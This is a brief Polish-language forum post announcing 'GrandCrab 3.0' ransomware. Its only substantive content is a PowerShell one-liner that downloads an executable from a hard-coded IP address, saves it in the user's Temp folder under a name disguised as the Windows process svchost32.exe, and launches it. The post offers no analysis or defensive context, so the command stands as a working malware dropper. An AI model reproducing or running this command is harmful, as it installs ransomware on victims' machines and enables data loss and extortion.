Nowy Ransomware GrandCrab 3.0
Powershell:
Treść widoczna jedynie dla zarejestrowanych użytkowników
Powershell:
Kod:
(New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/bamm.exe','C:\Users\xx\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\xx\AppData\Local\Temp\svchost32.exe'